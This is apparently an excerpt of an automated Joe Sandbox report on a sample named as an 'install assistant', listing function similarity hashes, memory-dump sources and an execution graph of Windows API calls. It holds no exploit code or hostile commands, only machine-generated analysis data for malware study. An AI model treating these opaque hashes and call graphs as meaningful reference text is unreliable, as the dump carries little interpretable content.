                                          • Associated: 00000005.00000002.1871037816.000000006C8B9000.00000020.00000001.01000000.00000009.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_6c630000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                          Similarity
                                          • API ID: H_prolog
                                          • String ID: $D^J
                                          • API String ID: 3519838083-3977321784
                                          • Opcode ID: 592ff2149492c1b5d1f5267e2a791cd36de2b3efa6476b1a9cfe308cba17f1e8
                                          • Instruction ID: f5e28a858c579bbe6972a1d885155b539d2d50faaf244a1a5780a4fa7b782f82
                                          • Opcode Fuzzy Hash: 592ff2149492c1b5d1f5267e2a791cd36de2b3efa6476b1a9cfe308cba17f1e8
                                          • Instruction Fuzzy Hash: C9416821B065917FD7328B6DCEA5BF8BBA19F16308F148D78C4D247E85DB64588AC390
                                          APIs
                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00000000,?,?,00000000,6C7D46D6), ref: 6C7CD01B
                                          • __dosmaperr.LIBCMT ref: 6C7CD022
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.1869177051.000000006C631000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C630000, based on PE: true
                                          • Associated: 00000005.00000002.1869151860.000000006C630000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000005.00000002.1870349068.000000006C7D8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000005.00000002.1870417368.000000006C7E8000.00000008.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000005.00000002.1871010009.000000006C8B3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000005.00000002.1871037816.000000006C8B9000.00000020.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000005.00000002.1871780908.000000006C9A2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_6c630000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                          Similarity
                                          • API ID: ErrorLast__dosmaperr
                                          • String ID: 8Q
                                          • API String ID: 1659562826-4022487301
                                          • Opcode ID: 425720986d8c72e8a43241ff210f3097090c8d814fead69205c8ebcf105d5503
                                          • Instruction ID: 1942c0e20635ed416fba03bfb80d80635c2a2fae7f868e1f371b82a3eb492cf3
                                          • Opcode Fuzzy Hash: 425720986d8c72e8a43241ff210f3097090c8d814fead69205c8ebcf105d5503
                                          • Instruction Fuzzy Hash: EA41ED32704196AFD721DF6CCA80BA97FE4EF47309F284269E8808B702D3719C02C796
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.1869177051.000000006C631000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C630000, based on PE: true
                                          • Associated: 00000005.00000002.1869151860.000000006C630000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000005.00000002.1870349068.000000006C7D8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000005.00000002.1870417368.000000006C7E8000.00000008.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000005.00000002.1871010009.000000006C8B3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000005.00000002.1871037816.000000006C8B9000.00000020.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000005.00000002.1871780908.000000006C9A2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_6c630000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                          Similarity
                                          • API ID: _strlen
                                          • String ID: U#hl$q!hl
                                          • API String ID: 4218353326-1496782519
                                          • Opcode ID: 423e2b0066346b8af9a477a992f3a2c594eb99b0d1eb4fc3422dc72b24055755
                                          • Instruction ID: 01c010e650a5bae16a1a1f516ee23110174cf6497261908212bf150952b6922f
                                          • Opcode Fuzzy Hash: 423e2b0066346b8af9a477a992f3a2c594eb99b0d1eb4fc3422dc72b24055755
                                          • Instruction Fuzzy Hash: BB4191B2D012189BDB00DFA4DD88ADEBBB9EF48354F150125E804A7740E7359A58CBA5
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.1870417368.000000006C7E8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C7E8000, based on PE: true
                                          • Associated: 00000005.00000002.1871010009.000000006C8B3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000005.00000002.1871037816.000000006C8B9000.00000020.00000001.01000000.00000009.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_6c630000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                          Similarity
                                          • API ID: H_prolog
                                          • String ID: X&L$p|J
                                          • API String ID: 3519838083-2944591232
                                          • Opcode ID: 9119c1f64bb26ad996fbea7536e901d29dd4483baa18a121855aa129662547ca
                                          • Instruction ID: 168fd1e2c666f8f19537f7bb45074787ed93c0d02afee5fa34b04ce2e2874906
                                          • Opcode Fuzzy Hash: 9119c1f64bb26ad996fbea7536e901d29dd4483baa18a121855aa129662547ca
                                          • Instruction Fuzzy Hash: 313128326D6309C7D7209B58DB0DBEA7765EB25328F10452ED510A6EEACB7889C5CAC0
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.1870417368.000000006C7E8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C7E8000, based on PE: true
                                          • Associated: 00000005.00000002.1871010009.000000006C8B3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000005.00000002.1871037816.000000006C8B9000.00000020.00000001.01000000.00000009.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_6c630000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                          Similarity
                                          • API ID: H_prolog
                                          • String ID: 0|J$`)L
                                          • API String ID: 3519838083-117937767
                                          • Opcode ID: 924921a2771934cbe07cb1819a4d5bd42f54cfcb7b164b76471555bcaac8b42b
                                          • Instruction ID: 2518cd447e1b12463090c71ff35d6dec98c73067f676a3de5277f311ff4595f8
                                          • Opcode Fuzzy Hash: 924921a2771934cbe07cb1819a4d5bd42f54cfcb7b164b76471555bcaac8b42b
                                          • Instruction Fuzzy Hash: 9041B532601745EFCB219F64C6987EEBBE2FF89309F00482EE45697B50CB756944CBA1
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.1870417368.000000006C7E8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C7E8000, based on PE: true
                                          • Associated: 00000005.00000002.1871010009.000000006C8B3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000005.00000002.1871037816.000000006C8B9000.00000020.00000001.01000000.00000009.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_6c630000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                          Similarity
                                          • API ID: __aulldiv
                                          • String ID: 3333
                                          • API String ID: 3732870572-2924271548
                                          • Opcode ID: 0d34d547a1763b1f6cbcb81569cbe66ca114cba913daa42be50c89cb46dd64ee
                                          • Instruction ID: f09c4ed9ac0892f7a6d2c403fda9f9bbf2b09ff8a25a103b5f643efadc4b8a46
                                          • Opcode Fuzzy Hash: 0d34d547a1763b1f6cbcb81569cbe66ca114cba913daa42be50c89cb46dd64ee
                                          • Instruction Fuzzy Hash: F421A6B1A017046FD7308FAAC984B6BBAFDFB44715F108D2EB146D7B40D770A9448BA5
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.1870417368.000000006C7E8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C7E8000, based on PE: true
                                          • Associated: 00000005.00000002.1871010009.000000006C8B3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000005.00000002.1871037816.000000006C8B9000.00000020.00000001.01000000.00000009.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_6c630000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                          Similarity
                                          • API ID: H_prolog
                                          • String ID: @$LuJ
                                          • API String ID: 3519838083-205571748
                                          • Opcode ID: aa36ca613ac24c818774a3b50af302aa3ac6c7e5dc6eeb3b6f96232f2efdcf83
                                          • Instruction ID: 45162eb65b66b4f461abc8a428bb6fdf70d346e658a0a09379c6daf2ed9ebafa
                                          • Opcode Fuzzy Hash: aa36ca613ac24c818774a3b50af302aa3ac6c7e5dc6eeb3b6f96232f2efdcf83
                                          • Instruction Fuzzy Hash: 0801C4B1E01349DADB20DF9985945AEF7B4FF55304F40882EE02AE3B40C3386944CB95
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.1870417368.000000006C7E8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C7E8000, based on PE: true
                                          • Associated: 00000005.00000002.1871010009.000000006C8B3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000005.00000002.1871037816.000000006C8B9000.00000020.00000001.01000000.00000009.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_6c630000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                          Similarity
                                          • API ID: H_prolog
                                          • String ID: @$xMJ
                                          • API String ID: 3519838083-951924499
                                          • Opcode ID: 871999b8a6dfe8dd14063548d73ca1d86140603a6c3ba165e22a59db3157078a
                                          • Instruction ID: cc6fd4d93c3cda494d1e54b81630a6373d6c969c46ae36c511291e499ab47e4e
                                          • Opcode Fuzzy Hash: 871999b8a6dfe8dd14063548d73ca1d86140603a6c3ba165e22a59db3157078a
                                          • Instruction Fuzzy Hash: 6A117CB1A01209DBCB10DF99C5D45AEB7B4FF58348B50C82ED479E7B00D3389A16CB55
                                          APIs
                                          • _free.LIBCMT ref: 6C7CDD49
                                          • HeapReAlloc.KERNEL32(00000000,?,?,00000004,00000000,?,6C7CA63A,?,00000004,?,4B42FCB6,?,?,6C7BF78C,4B42FCB6,?), ref: 6C7CDD85
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.1869177051.000000006C631000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C630000, based on PE: true
                                          • Associated: 00000005.00000002.1869151860.000000006C630000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000005.00000002.1870349068.000000006C7D8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000005.00000002.1870417368.000000006C7E8000.00000008.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000005.00000002.1871010009.000000006C8B3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000005.00000002.1871037816.000000006C8B9000.00000020.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000005.00000002.1871780908.000000006C9A2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_6c630000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                          Similarity
                                          • API ID: AllocHeap_free
                                          • String ID: 8Q
                                          • API String ID: 1080816511-4022487301
                                          • Opcode ID: fa47c58c95e95cae6881c793cbef599b47207caecfee1faea8afcad01283ead0
                                          • Instruction ID: de5e050cba9566cd0d62042c03baf7fef2b892ff38602f1cbe1f519a757d07c7
                                          • Opcode Fuzzy Hash: fa47c58c95e95cae6881c793cbef599b47207caecfee1faea8afcad01283ead0
                                          • Instruction Fuzzy Hash: C5F0C832B81A076EDB211E669E4DB9A37688F93B78B150537E81497E90EB30C401D5EB
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.1870417368.000000006C7E8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C7E8000, based on PE: true
                                          • Associated: 00000005.00000002.1871010009.000000006C8B3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000005.00000002.1871037816.000000006C8B9000.00000020.00000001.01000000.00000009.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_6c630000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                          Similarity
                                          • API ID: H_prologctype
                                          • String ID: |zJ
                                          • API String ID: 3037903784-3782439380
                                          • Opcode ID: 45f9250e3087bdd449dea7a7c5ec79293aeb189375d795e63a98390aaf881842
                                          • Instruction ID: 0c46ae7101cf0262a46fb2e8fff1bd87d912b6e787b19b8443359270f4488822
                                          • Opcode Fuzzy Hash: 45f9250e3087bdd449dea7a7c5ec79293aeb189375d795e63a98390aaf881842
                                          • Instruction Fuzzy Hash: 42E06572A155109BEB258F48DA147DEF3ACFF64B14F10446F9016A7A41CBB5AD4486C1
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.1870417368.000000006C7E8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C7E8000, based on PE: true
                                          • Associated: 00000005.00000002.1871010009.000000006C8B3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000005.00000002.1871037816.000000006C8B9000.00000020.00000001.01000000.00000009.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_6c630000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                          Similarity
                                          • API ID: H_prologctype
                                          • String ID: <oJ
                                          • API String ID: 3037903784-2791053824
                                          • Opcode ID: f66cbee60b40af54c04d64295f8ed3aa4e69c018a581ef3e0b0762c85e8ebc26
                                          • Instruction ID: 684dd552967136d75c06ba0c969672ec78f5cfc5958097dc26d6ad4b69f7fe1f
                                          • Opcode Fuzzy Hash: f66cbee60b40af54c04d64295f8ed3aa4e69c018a581ef3e0b0762c85e8ebc26
                                          • Instruction Fuzzy Hash: 53E06D32A1A5159BDB249F48DA20BEEF7A8EF55724F11452EE012A7F51CBB2A8048684
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.1870417368.000000006C7E8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C7E8000, based on PE: true
                                          • Associated: 00000005.00000002.1871010009.000000006C8B3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000005.00000002.1871037816.000000006C8B9000.00000020.00000001.01000000.00000009.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_6c630000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: @ K$DJ$T)K$X/K
                                          • API String ID: 0-3815299647
                                          • Opcode ID: c2360a40d33ebeca7632374cab2a44736fbf981b028df34ec032509b6de52aa1
                                          • Instruction ID: 74738cda08e431f8e49f015cc54b7062796955a4df79e225a1c83ff769e39505
                                          • Opcode Fuzzy Hash: c2360a40d33ebeca7632374cab2a44736fbf981b028df34ec032509b6de52aa1
                                          • Instruction Fuzzy Hash: 6791033160438D9BCF20DEA4C6547EE73A2AF6630CF10CC1EC8621BB85DB79A949CB51
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.1870417368.000000006C7E8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C7E8000, based on PE: true
                                          • Associated: 00000005.00000002.1871010009.000000006C8B3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000005.00000002.1871037816.000000006C8B9000.00000020.00000001.01000000.00000009.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_6c630000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: D)K$H)K$P)K$T)K
                                          • API String ID: 0-2262112463
                                          • Opcode ID: 9be5c025380eda7c216aac381ad020450c93343e5c05b53f9846b5bc651498f8
                                          • Instruction ID: ae6ec206d89c3b9631ba36d15d2ea3ed56214c7ebac5b9c14213653f20eabcea
                                          • Opcode Fuzzy Hash: 9be5c025380eda7c216aac381ad020450c93343e5c05b53f9846b5bc651498f8
                                          • Instruction Fuzzy Hash: 5651C37290420D9BCF11CF94DA48ADEB7B5EFA931CF10C81AE81167A90DB76994CC750

                                          Execution Graph

                                          Execution Coverage:4%
                                          Dynamic/Decrypted Code Coverage:0%
                                          Signature Coverage:0.4%
                                          Total number of Nodes:2000
                                          Total number of Limit Nodes:31
                                          execution_graph 73232 c9d948 73262 c9dac7 73232->73262 73234 c9d94f 73270 c72e04 73234->73270 73237 c72e04 2 API calls 73238 c9d987 73237->73238 73241 c9d9e7 73238->73241 73273 c76404 73238->73273 73243 c9da0f 73241->73243 73260 c9da36 73241->73260 73298 c71e40 free 73243->73298 73245 c9da94 73311 c71e40 free 73245->73311 73247 c9d9bf 73296 c71e40 free 73247->73296 73248 c9da17 73299 c71e40 free 73248->73299 73253 c9d9c7 73297 c71e40 free 73253->73297 73254 c9da9c 73312 c71e40 free 73254->73312 73258 c9d9cf 73260->73245 73300 c72da9 73260->73300 73303 cb04d2 73260->73303 73309 c71524 malloc _CxxThrowException __EH_prolog ctype 73260->73309 73310 c71e40 free 73260->73310 73263 c9dad1 __EH_prolog 73262->73263 73264 c72e04 2 API calls 73263->73264 73265 c9db33 73264->73265 73266 c72e04 2 API calls 73265->73266 73267 c9db3f 73266->73267 73268 c72e04 2 API calls 73267->73268 73269 c9db55 73268->73269 73269->73234 73313 c71e0c 73270->73313 73318 c7631f 73273->73318 73276 c76423 73322 c72f88 73276->73322 73277 c72f88 3 API calls 73277->73276 73279 c7643d 73280 c87e5a 73279->73280 73281 c87e64 __EH_prolog 73280->73281 73395 c88179 73281->73395 73286 c72fec 3 API calls 73287 c87e9a 73286->73287 73288 c72da9 2 API calls 73287->73288 73289 c87ea7 73288->73289 73404 c76c72 73289->73404 73293 c87ed8 73293->73241 73293->73247 73294 c87ecb 73294->73293 73506 c7757d GetLastError 73294->73506 73296->73253 73297->73258 73298->73248 73299->73258 73681 c72d4d 73300->73681 73302 c72dc6 73302->73260 73304 cb04df 73303->73304 73305 cb0513 73303->73305 73306 cb04e8 _CxxThrowException 73304->73306 73307 cb04fd 73304->73307 73305->73260 73306->73307 73684 cb0551 malloc _CxxThrowException free memcpy ctype 73307->73684 73309->73260 73310->73260 73311->73254 73312->73258 73314 c71e15 73313->73314 73315 c71e1c malloc 73313->73315 73314->73315 73316 c71e3e 73315->73316 73317 c71e2a _CxxThrowException 73315->73317 73316->73237 73317->73316 73319 c79245 73318->73319 73328 c790da 73319->73328 73323 c72f9a 73322->73323 73324 c71e0c ctype 2 API calls 73323->73324 73325 c72fbe 73323->73325 73326 c72fb4 73324->73326 73325->73279 73325->73325 73394 c71e40 free 73326->73394 73329 c790e4 __EH_prolog 73328->73329 73330 c72f88 3 API calls 73329->73330 73331 c790f7 73330->73331 73332 c7915d 73331->73332 73337 c79109 73331->73337 73333 c72e04 2 API calls 73332->73333 73334 c79165 73333->73334 73335 c791be 73334->73335 73338 c79174 73334->73338 73378 c76332 6 API calls 2 library calls 73335->73378 73352 c76414 73337->73352 73369 c72e47 73337->73369 73339 c72f88 3 API calls 73338->73339 73340 c7917d 73339->73340 73366 c791ca 73340->73366 73376 c7859e malloc _CxxThrowException free _CxxThrowException 73340->73376 73346 c79185 73351 c72e04 2 API calls 73346->73351 73347 c7912e 73348 c7914d 73347->73348 73374 c731e5 malloc _CxxThrowException free _CxxThrowException 73347->73374 73375 c71e40 free 73348->73375 73353 c79197 73351->73353 73352->73276 73352->73277 73354 c7919f 73353->73354 73355 c791ce 73353->73355 73357 c791b9 73354->73357 73377 c71089 malloc _CxxThrowException free _CxxThrowException 73354->73377 73356 c72f88 3 API calls 73355->73356 73356->73357 73379 c73199 malloc _CxxThrowException free _CxxThrowException 73357->73379 73360 c791e6 73380 c78f57 memmove 73360->73380 73362 c791ee 73363 c791f2 73362->73363 73381 c72fec 73362->73381 73388 c71e40 free 73363->73388 73389 c71e40 free 73366->73389 73370 c72e57 73369->73370 73390 c72ba6 73370->73390 73373 c78f57 memmove 73373->73347 73374->73348 73375->73352 73376->73346 73377->73357 73378->73340 73379->73360 73380->73362 73382 c72ffc 73381->73382 73386 c72ff8 73381->73386 73383 c71e0c ctype 2 API calls 73382->73383 73382->73386 73384 c73010 73383->73384 73393 c71e40 free 73384->73393 73387 c731e5 malloc _CxxThrowException free _CxxThrowException 73386->73387 73387->73363 73388->73366 73389->73352 73391 c71e0c ctype 2 API calls 73390->73391 73392 c72bbb 73391->73392 73392->73373 73393->73386 73394->73325 73398 c88906 73395->73398 73396 c87e77 73400 c97ebb 73396->73400 73398->73396 73507 c88804 free ctype 73398->73507 73508 c71e40 free 73398->73508 73401 c87e7f 73400->73401 73403 c97ec6 73400->73403 73401->73286 73402 c71e40 free ctype 73402->73403 73403->73401 73403->73402 73406 c76c7c __EH_prolog 73404->73406 73405 c76cd3 73408 c76ce2 73405->73408 73411 c76d87 73405->73411 73406->73405 73407 c76cb7 73406->73407 73409 c72f88 3 API calls 73407->73409 73410 c72f88 3 API calls 73408->73410 73412 c76cc7 73409->73412 73416 c76cf5 73410->73416 73413 c72e47 2 API calls 73411->73413 73414 c76f4a 73411->73414 73505 c71e40 free 73412->73505 73415 c76db0 73413->73415 73421 c76fd1 73414->73421 73424 c76f7e 73414->73424 73418 c72e47 2 API calls 73415->73418 73417 c76d4a 73416->73417 73419 c76d0b 73416->73419 73526 c77b41 28 API calls 73417->73526 73426 c76dc0 73418->73426 73525 c79252 GetModuleHandleW GetProcAddress GetDiskFreeSpaceW 73419->73525 73428 c770e5 73421->73428 73429 c76fed 73421->73429 73448 c7701d 73421->73448 73423 c76d5f 73527 c7764c 73423->73527 73547 c76bf5 11 API calls 2 library calls 73424->73547 73425 c76d36 73425->73417 73431 c76d3a 73425->73431 73440 c76dfe 73426->73440 73530 c73221 malloc _CxxThrowException free _CxxThrowException 73426->73530 73509 c76868 73428->73509 73549 c76bf5 11 API calls 2 library calls 73429->73549 73431->73412 73434 c76f85 73434->73428 73438 c76f99 73434->73438 73436 c76ff2 73436->73428 73441 c77006 73436->73441 73437 c76fca 73444 c76848 FindClose 73437->73444 73447 c72f88 3 API calls 73438->73447 73439 c76e43 73443 c76c72 42 API calls 73439->73443 73440->73439 73454 c76e1e 73440->73454 73441->73437 73446 c76e4e 73443->73446 73444->73412 73449 c76e41 73446->73449 73450 c76f3a 73446->73450 73451 c76fb0 73447->73451 73448->73428 73550 c7717b 13 API calls 73448->73550 73531 c72f1c 73449->73531 73545 c71e40 free 73450->73545 73548 c7717b 13 API calls 73451->73548 73454->73449 73459 c72fec 3 API calls 73454->73459 73456 c77052 73460 c77056 73456->73460 73461 c77064 73456->73461 73458 c76f42 73546 c71e40 free 73458->73546 73459->73449 73464 c72f88 3 API calls 73460->73464 73466 c72e47 2 API calls 73461->73466 73467 c7705f 73464->73467 73465 c72e04 2 API calls 73491 c76e83 73465->73491 73468 c7706d 73466->73468 73471 c76848 FindClose 73467->73471 73551 c71089 malloc _CxxThrowException free _CxxThrowException 73468->73551 73471->73412 73472 c7707b 73552 c71089 malloc _CxxThrowException free _CxxThrowException 73472->73552 73473 c76ecf 73538 c71e40 free 73473->73538 73475 c76ec7 SetLastError 73475->73473 73476 c77085 73477 c76868 12 API calls 73476->73477 73480 c77095 73477->73480 73484 c770bb 73480->73484 73485 c77099 wcscmp 73480->73485 73481 c76f11 73539 c71e40 free 73481->73539 73483 c76ed3 73537 c731e5 malloc _CxxThrowException free _CxxThrowException 73483->73537 73553 c76bf5 11 API calls 2 library calls 73484->73553 73485->73484 73488 c770b1 73485->73488 73486 c76f19 73540 c76848 73486->73540 73494 c72f88 3 API calls 73488->73494 73491->73473 73491->73475 73491->73483 73496 c72e04 2 API calls 73491->73496 73534 c76bb5 17 API calls 73491->73534 73535 c722bf CharUpperW 73491->73535 73536 c71e40 free 73491->73536 73492 c770c6 73499 c770d8 73492->73499 73504 c77129 73492->73504 73497 c7714c 73494->73497 73496->73491 73556 c71e40 free 73497->73556 73554 c71e40 free 73499->73554 73501 c76f2b 73544 c71e40 free 73501->73544 73504->73488 73505->73294 73506->73293 73507->73398 73508->73398 73510 c76872 __EH_prolog 73509->73510 73511 c76848 FindClose 73510->73511 73513 c76880 73511->73513 73512 c768f6 73512->73437 73555 c7717b 13 API calls 73512->73555 73513->73512 73514 c7689b FindFirstFileW 73513->73514 73515 c768a9 73513->73515 73514->73515 73517 c72e04 2 API calls 73515->73517 73524 c768ee 73515->73524 73518 c768ba 73517->73518 73557 c78b4a 73518->73557 73520 c768d0 73521 c768d4 FindFirstFileW 73520->73521 73522 c768e2 73520->73522 73521->73522 73562 c71e40 free 73522->73562 73524->73512 73563 c76919 malloc _CxxThrowException free 73524->73563 73525->73425 73526->73423 73528 c77656 CloseHandle 73527->73528 73529 c77661 73527->73529 73528->73529 73529->73412 73530->73440 73532 c72ba6 2 API calls 73531->73532 73533 c72f2c 73532->73533 73533->73465 73534->73491 73535->73491 73536->73491 73537->73473 73538->73481 73539->73486 73541 c76852 FindClose 73540->73541 73542 c7685d 73540->73542 73541->73542 73543 c71e40 free 73542->73543 73543->73501 73544->73412 73545->73458 73546->73414 73547->73434 73548->73437 73549->73436 73550->73456 73551->73472 73552->73476 73553->73492 73554->73436 73555->73437 73556->73467 73564 c78b80 73557->73564 73560 c78b6e 73560->73520 73561 c72f88 3 API calls 73561->73560 73562->73524 73563->73512 73566 c78b8a __EH_prolog 73564->73566 73565 c78b55 73565->73560 73565->73561 73566->73565 73567 c78c7b 73566->73567 73573 c78be1 73566->73573 73568 c78d23 73567->73568 73569 c78c8f 73567->73569 73570 c78e8a 73568->73570 73572 c78d3b 73568->73572 73569->73572 73576 c78c9e 73569->73576 73571 c72e47 2 API calls 73570->73571 73574 c78e96 73571->73574 73575 c72e04 2 API calls 73572->73575 73573->73565 73577 c72e47 2 API calls 73573->73577 73583 c72e47 2 API calls 73574->73583 73578 c78d43 73575->73578 73580 c72e47 2 API calls 73576->73580 73581 c78c05 73577->73581 73661 c76332 6 API calls 2 library calls 73578->73661 73594 c78ca7 73580->73594 73588 c78c17 73581->73588 73589 c78c24 73581->73589 73582 c78d52 73584 c78d56 73582->73584 73662 c7859e malloc _CxxThrowException free _CxxThrowException 73582->73662 73585 c78eb8 73583->73585 73672 c71e40 free 73584->73672 73673 c78f57 memmove 73585->73673 73651 c71e40 free 73588->73651 73592 c72e47 2 API calls 73589->73592 73591 c78ec4 73595 c78ede 73591->73595 73596 c78ec8 73591->73596 73597 c78c35 73592->73597 73598 c72e47 2 API calls 73594->73598 73652 c78f57 memmove 73597->73652 73602 c78cd0 73598->73602 73656 c78f57 memmove 73602->73656 73604 c78c41 73608 c78c6b 73604->73608 73653 c731e5 malloc _CxxThrowException free _CxxThrowException 73604->73653 73655 c71e40 free 73608->73655 73609 c78cdc 73610 c78d13 73609->73610 73657 c73221 malloc _CxxThrowException free _CxxThrowException 73609->73657 73617 c78c73 73618 c78ced 73619 c72e04 2 API calls 73623 c78ddf 73619->73623 73620 c78c60 73654 c731e5 malloc _CxxThrowException free _CxxThrowException 73620->73654 73630 c78d65 73630->73584 73630->73619 73651->73565 73652->73604 73653->73620 73654->73608 73655->73617 73656->73609 73657->73618 73661->73582 73662->73630 73672->73565 73673->73591 73682 c72ba6 2 API calls 73681->73682 73683 c72d68 73682->73683 73683->73302 73683->73683 73684->73305 73685 c7b144 73686 c7b153 73685->73686 73688 c7b159 73685->73688 73689 c811b4 73686->73689 73690 c811c1 73689->73690 73691 c811eb 73690->73691 73694 cbaf27 73690->73694 73701 cbae7c 73690->73701 73691->73688 73697 cbaf36 73694->73697 73695 cbb010 73695->73690 73696 cbaeeb 107 API calls 73696->73697 73697->73695 73697->73696 73706 c7bd0c 73697->73706 73711 cbad3a 73697->73711 73715 cbaebf 107 API calls 73697->73715 73702 cbae86 73701->73702 73704 c87140 7 API calls 73702->73704 74248 c87190 73702->74248 73703 cbaebb 73703->73690 73704->73703 73716 c77ca2 73706->73716 73709 c7bd3d 73709->73697 73712 cbad44 __EH_prolog 73711->73712 73724 c86305 73712->73724 73713 cbadbf 73713->73697 73715->73697 73718 c77caf 73716->73718 73719 c77cdb 73718->73719 73721 c77c68 73718->73721 73719->73709 73720 c7b8ec GetLastError 73719->73720 73720->73709 73722 c77c76 73721->73722 73723 c77c79 WriteFile 73721->73723 73722->73723 73723->73718 73725 c8630f __EH_prolog 73724->73725 73761 c862b9 73725->73761 73728 c86427 73730 c7965d VariantClear 73728->73730 73729 c8644a 73765 c7965d 73729->73765 73757 c86445 73730->73757 73740 c865de 73741 c8669e 73740->73741 73742 c865e7 73740->73742 73749 c866b8 73741->73749 73750 c86754 73741->73750 73741->73757 73745 c865f6 73742->73745 73747 c71e0c ctype 2 API calls 73742->73747 73743 c864ca 73744 c864da 73743->73744 73743->73757 73929 c742e3 CharUpperW 73743->73929 73744->73740 73744->73757 73930 c8789c free memmove ctype 73744->73930 73931 c936ea 73745->73931 73747->73745 73752 c71e0c ctype 2 API calls 73749->73752 73818 c85bea 73750->73818 73751 c8666b 73944 c71e40 free 73751->73944 73752->73757 73754 c8665c 73943 c731e5 malloc _CxxThrowException free _CxxThrowException 73754->73943 73757->73713 73762 c862c9 73761->73762 73945 c98fa4 73762->73945 73766 c79685 73765->73766 73768 c79665 73765->73768 73769 c85126 73766->73769 73767 c7967e VariantClear 73767->73766 73768->73766 73768->73767 73770 c85130 __EH_prolog 73769->73770 73771 c851b4 73770->73771 73777 c8518e 73770->73777 73989 c73097 malloc _CxxThrowException free SysStringLen ctype 73770->73989 73773 c7965d VariantClear 73771->73773 73771->73777 73776 c851bc 73773->73776 73774 c7965d VariantClear 73775 c8527f 73774->73775 73775->73757 73811 c98b05 73775->73811 